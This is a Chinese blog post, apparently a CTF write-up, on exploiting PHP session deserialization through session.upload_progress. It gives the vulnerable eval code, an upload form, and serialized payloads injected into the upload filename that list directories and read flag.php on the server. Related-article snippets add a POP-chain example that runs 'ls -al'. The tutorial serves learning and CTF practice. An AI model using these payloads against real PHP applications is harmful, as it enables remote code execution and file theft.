pop链与php序列化入门

最新推荐文章于 2024-04-24 17:20:18 发布
最新推荐文章于 2024-04-24 17:20:18 发布
阅读量474 收藏 1
点赞数 1
分类专栏: php代码审计 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46230316/article/details/105903116
版权

php学不好,一切都白搭(亲身体验)

直接上题,结合题目进行理解

<?php
//A webshell is wait for you
//flag in flag.php
ini_set('session.serialize_handler', 'php');
session_start();
//var_dump($_SESSION);
class OO0o0oO00o
{
    public $cool;
    function __construct()
    {
        $this->cool = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->cool);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OO0o0oO00o();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

进行审计,并没有可以反序列化的点,但是发现了ini_set('session.serialize_handler', 'php');,这里选择session序列化处理器。
根据这里,如果没有上传PHPinfo这个参数,就显示源码

if(isset($_GET['phpinfo']))
{
    $m = new OO0o0oO00o();
}
else
{
    highlight_string(file_get_contents('index.php'));
}

所以我们上传这个参数,转到这页,在php 5.5.4以前默认选择的是php,5.5.4之后就是php_serialize,这里php版本为5.6.21,所以选择器默认为php_serialize,而在index页面,设置选择的是php(即ini_set(‘session.serialize_handler’, ‘php’)),这时候就要警惕,可能会造成session序列化选择器漏洞

  • 虽然我们在index.php中声明了选择php序列化选择器,但是这只是影响生成的session,而当session_start(),使用时,php就将session默认文件夹中的session进行反序列化。注意进行反序列化的时候会使用原来默认的序列化处理器。。反言之,只要我们将构造好的session放入session中,在session_start()后,就将session反序列化,就产生了漏洞

在这里插入图片描述
当发现session.upload_progress.enabled设置为on时,就有了可操作空间了
在这里插入图片描述
接下来我们就需要开始思考了,怎么才可以调用到类OO0o0oO00o中的eval()函数执行任意代码呢?

1.这里面没有任何一个可以进入的入口,但是我们要利用php反序列化必须要有序列化、反序列化函数
2.我们利用的是session的反序列化漏洞,怎么才能改变session呢
这时候就要利用我们之前发现的session.upload_progress.enabled

  • 通过phpinfo页面,我们知道php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。
  • session.upload_progress.enabled为On,当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量,当PHP检测到这种POST请求时,它会在$_SESSION中添加一组数据,即就可以将filename的值赋值到session中。所以可以通过Session Upload Progress来设置session。

我们在本地搭建一个上传页面,代码如下

<form action="http://xxxxxxxx" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

接下来构造pop链

<?php
class OO0o0oO00o
{
    public $cool='xxxxx';
}
$obj = new OO0o0oO00o();
echo serialize($obj);
?>

意思如下
[__PHP_Incomplete_Class_Name]=>OO0o0oO00o
[cool]=>xxxxx
找一个php在线运行的工具即可
在这里插入图片描述
在这里将xxxxx替换为print_r(scandir(dirname(__FILE__)));,print_f表输出,scandir用于扫描目录下文件,dirname用于显示所在目录,_FILE_表示当前文件
序列化后为

O:10:"OO0o0oO00o":1:{s:4:"cool";s:36:"print_r(scandir(dirname(__FILE__)));";}

为防止转义,在引号前加上反斜杠\,利用前面的html页面随便上传一个东西,抓包,只把filename改为如下:(这里忘了截图,但是跟最后那个图是一样的改法)

|O:10:\"OO0o0oO00o\":1:{s:4:\"cool\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

这里可以得到当前文件的名字,flag.php,在一开始的phpinfo页中,也可以得到目录
再把xxxxx改为print_r(file_get_contents("/var/www/html/flag.php"));,继续运行
在这里插入图片描述
,得到playload

O:10:"OO0o0oO00o":1:{s:4:"cool";s:53:"print_r(file_get_contents("/var/www/html/flag.php"));";}

跟上面一样的改法

|O:10:\"OO0o0oO00o\":1:{s:4:\"cool";s:53:\"print_r(file_get_contents(\"/var/www/html/flag.php\"));\";}

bp抓包改filename,得到flag
请添加图片描述

mon0dy
关注
专栏目录
POP学习
blue_fantasy的博客
01-09 718
Text. __wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //当程序调用到当前类中未声明或没权限调用的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //当程序调用一个未定义或不可见的成员变量时触发,请求类里不存在的属性则自动触发 __set() //当程序试图写入一个不存在或不可见的成员变量时触发 __isset()
【CTFSHOW】web入门序列化
7ruth0hn的博客
07-25 3470
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
php序列化学习(中)--pop的构造
最新发布
qq_75120258的博客
04-24 1059
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
PHP 魔术方法浅谈
ansong8919的博客
03-23 209
php中把以两个下划线(__)开头的方法称之为魔术方法。魔术方法包括: __construct() 类的构造方法 构建方法时被调用 __destruct() 类的析构方法 明确销毁对象或脚本结束时被调用 __call() 在一个类中调用一个不可访问或不存在的方法时使用 __callStatic() 调用不可访问或者是不存在的静...
pop php,PHP序列化入门之寻找POP(一)
weixin_34547167的博客
04-01 736
环境搭建运行环境要求PHP >= 7.1.3OpenSSL PHP ExtensionPDO PHP ExtensionMbstring PHP Extension安装题目环境运行题目代码漏洞点在 routes/web.php 文件中,定义了 web 程序的路由,当我们以 GET 或 POST 方法访问 app/Http/Controllers/EditorController.php 类中...
PHP序列化--pop
2302_79800344的博客
03-18 1476
pop知识是PHP序列化模块不可或缺的组成部分
ctfshow web入门 序列化
Lumos427的博客
02-25 1541
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
java安全 反序列化(二)
sechelper的博客
12-07 615
java反射,CC6源码分析,LazyMap利用连,ysoserial工具
PHP序列化和反序列化入门
qq_35897989的博客
03-30 196
有关php序列化的一下知识
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 446
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
php序列化漏洞之pop
weixin_60719780的博客
02-08 2332
常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与
php中的pop构造
blackguest07的博客
03-02 1499
php中反序列化漏洞的原理,pop的构造。
pop php,POP
weixin_36409144的博客
04-01 533
在二进制安全领域,Return-oriented programming(ROP)是一种常用的绕过防护攻击方式。攻击者可以利用内存中已有的进程片段(称作gadgets),通过汇集这些进程片构建一个攻击途径(称作gadget chains)。在2009年,Esser提出这种代码复用产生攻击的思想在PHP系统中同样适用[1][2]。0x01 PHP对象注入攻击PHP对象注入攻击本质上属于一种代码复用技...
php序列化pop构造
m0_62422842的博客
04-06 7629
前言 随着对反序列化学习的不断深入,我们来学习一下pop的构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
序列化学习——pop的构造
m0_73756016的博客
03-10 689
在反序列化中,我们能控制的数据就是对象中的属性值(成员变量所以在PHP序列化中有一种漏洞利用方法叫"面向属性编程"POP( Property Oriented Programming).Poc是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。然后让benben = fast这个类将其反序列化的时候顺理成章调用wakeup。所以要触发wakeup() 必须要反序列化fast这个类。魔术方法触发前提:魔术方法所在类(或对象)被调用。这里如果benben的值为反序列化类sec的结果。
PHP序列化pop的构造
Elite的博客
03-28 989
简单易懂的反序列化pop构造
CTF-PHP序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2071
PHP序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
PHP序列化—构造POP
Lemon's blog
04-03 4617
前言: 最近在刷题的时候发现这个PHP序列化POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
php序列化pop
10-17
PHP序列化POP是一种利用PHP序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程中触发恶意代码,从而实现攻击目的。POP是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__destruct()的特性,通过构造一条对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,从而实现攻击目的。 下面是一个简单的POP示例: ``` class A { public $b; function __construct($b) { $this->b = $b; } function __wakeup() { if (isset($this->b)) { unserialize($this->b); } } } class B { public $c; function __construct($c) { $this->c = $c; } function __destruct() { if (isset($this->c)) { unserialize($this->c); } } } class C { public $cmd; function __construct($cmd) { $this->cmd = $cmd; } } $cmd = 'ls -al'; $c = new C($cmd); $b = new B(serialize($c)); $a = new A(serialize($b)); $payload = serialize($a); ``` 在上面的代码中,我们构造了三个类A、B、C,其中类A包含一个成员变量$b,类B包含一个成员变量$c,类C包含一个成员变量$cmd。我们通过构造一个对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,最终执行$cmd变量中存储的命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值